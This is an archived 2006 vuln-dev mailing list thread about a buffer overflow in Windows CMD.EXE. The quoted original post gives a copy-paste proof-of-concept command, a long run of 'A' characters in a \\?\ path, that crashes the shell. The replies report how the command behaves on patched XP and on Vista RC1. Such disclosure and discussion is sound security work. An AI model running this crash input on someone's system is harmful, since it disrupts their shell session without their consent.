Vulnerability Development mailing list archives
RE: Windows Command Processor CMD.EXE Buffer Overflow
From: "Marvin Simkin" <Marvin.Simkin () asu edu>
Date: Fri, 20 Oct 2006 15:51:17 -0700
WXPSP2 fully patched: C:\>ver Microsoft Windows XP [Version 5.1.2600] C:\>%COMSPEC% /K "dir \?\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA The filename or extension is too long. C:\> ... but then, all the command history is lost; you cannot arrow-up to repeat the command. -----Original Message----- From: listbounce () securityfocus com on behalf of Osvaldo Casagrande Sent: Fri 2006-10-20 04:51 To: gregory_panakkal; vuln-dev () securityfocus com Subject: RE: Windows Command Processor CMD.EXE Buffer Overflow It does not works on Windows Vista RC1 (5728) Osvaldo Casagrande MCSE. MCT, MVP, Security+ Gerente de Servicios DiviServ S.A. D: 595(21) 613 828 | Cel. 595 (971) 300 836 | |: ocasagrande () diviserv com | Add me to messenger Busca mis referencias? / Looking for my personal references? Acces to Programa MVP - Access to Certificaciones MS On "Transcript ID" input: 740381 / On "Access Code" input: ViewMyInfo Running Windows Vista RC1- Build 5728 and Office 2007 Beta 2 TR CONFIDENCIALIDAD: La informacion contenida en este mail y sus anexos es confidencial y/o privilegiada y esta reservada para el destinatario unicamente. Si usted no es el destinatario o un agente responsable de enviar este mensaje al destinatario final, se le notifica que: No puede utilizarlo, retransmitirlo, imprimirlo, copiarlo o divulgar las informaciones contenidas en este mail o sus anexos o tomar cualquier accion basada en estas informaciones. Si usted recibe este mensaje por error, por favor avise inmediatamente al remitente, y tenga la amabilidad de borrarlo de su computadora o cualquier otro banco de datos. DIVISERV agradece su cooperacion. This mail message may contain confidential and/or privileged information for the adressee. If you are not the addressee or authorized to receive this for the addressee, you must not use, copy, print, retransmit, disclose or take any action based on this message or any information herein. If you have received this message by mistake, please advise the sender immediately replying this message and delete it from your computer and any database. DIVISERV appreciates your cooperation. -----Original Message----- From: listbounce () securityfocus com [mailto:listbounce () securityfocus com] On Behalf Of gregory_panakkal Sent: Wednesday, October 18, 2006 11:33 PM To: vuln-dev () securityfocus com Subject: Windows Command Processor CMD.EXE Buffer Overflow Windows Command Processor CMD.EXE Buffer Overflow Tested on WinXP SP2 Impact - Very Low Copy-paste the following line in cmd.exe and execute it.. (it is a single command, has been split into multiple lines for readability sake). %COMSPEC% /K "dir \\?\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" (260 characters of 'A's) DEP Comes into the picture. URL : http://www.infogreg.com/security/misc/windows-command-processor-cmd.exe-buffer-overflow.html regards, Gregory Panakkal www.infogreg.com -- gregory_panakkal gregory_panakkal () fastmail fm -- http://www.fastmail.fm - I mean, what is it about a decent email service?
Current thread:
- Windows Command Processor CMD.EXE Buffer Overflow gregory_panakkal (Oct 19)
- Re: Windows Command Processor CMD.EXE Buffer Overflow The SNiFF (Oct 20)
- RE: Windows Command Processor CMD.EXE Buffer Overflow Luis Alberto Cortes Zavala (Oct 21)
- RE: Windows Command Processor CMD.EXE Buffer Overflow Osvaldo Casagrande (Oct 20)
- RE: Windows Command Processor CMD.EXE Buffer Overflow Marvin Simkin (Oct 21)
- RE: Windows Command Processor CMD.EXE Buffer Overflow Marvin Simkin (Oct 21)
- RE: Windows Command Processor CMD.EXE Buffer Overflow gregory_panakkal (Oct 21)
- Re: Windows Command Processor CMD.EXE Buffer Overflow Dan Yefimov (Oct 22)
- RE: Windows Command Processor CMD.EXE Buffer Overflow Luis Alberto Cortes Zavala (Oct 22)
- Re: Windows Command Processor CMD.EXE Buffer Overflow Dan Yefimov (Oct 23)
- Re: Windows Command Processor CMD.EXE Buffer Overflow Danux (Oct 23)
- RE: Windows Command Processor CMD.EXE Buffer Overflow Marvin Simkin (Oct 21)
- RE: Windows Command Processor CMD.EXE Buffer Overflow Marvin Simkin (Oct 23)
- Re: Windows Command Processor CMD.EXE Buffer Overflow The SNiFF (Oct 20)
- Re: Windows Command Processor CMD.EXE Buffer Overflow Bernardo Wernesback (Oct 23)
- <Possible follow-ups>
- Re: Re: Windows Command Processor CMD.EXE Buffer Overflow mr . dan . friedman (Oct 24)